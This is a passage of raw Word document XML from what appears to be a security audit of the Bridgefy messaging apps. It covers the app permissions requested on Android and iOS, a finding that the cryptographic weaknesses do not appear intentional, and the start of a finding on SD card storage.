        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>coarseLocation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PackageManager.PERMISSION_GRANTED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="363" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The iOS implementation provided a more positive impression. In particular,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy iOS mobile app and SDK were found to request only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NSFaceIDUsageDescription </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>NSCameraUsageDescription </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>permissions. This can be verified in the following file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/Bridgefy/SupportingFiles/Info.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;NSFaceIDUsageDescription&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;Allow Face ID to improve app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>security&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;NSCameraUsageDescription&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;Allow usage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>camera&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="252"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>requesting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>app, as it is already being done by their iOS counterparts. This will eliminate any suspicion regarding potential user tracking and hence, improve user trust on the Bridgefy applications. In addition to this, it is advised to extrapolate the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q06</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>done,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>improvements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be possible by making certain Bridgefy components open source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250006" w:id="49"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q08:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>seem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>weaken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>intentionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="365" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q8: Do the apps intentionally weaken cryptographic procedures to ensure third-party </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>decryption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity identified a number of cryptographic weaknesses during this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>assignment,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as described in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-010</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Nevertheless, these did not appear to be intentional security weaknesses introduced to facilitate third party decryption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This being said, user trust may additionally be improved by extrapolating the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q07</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250005" w:id="50"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q09:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>SD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>insecurely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unclear</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
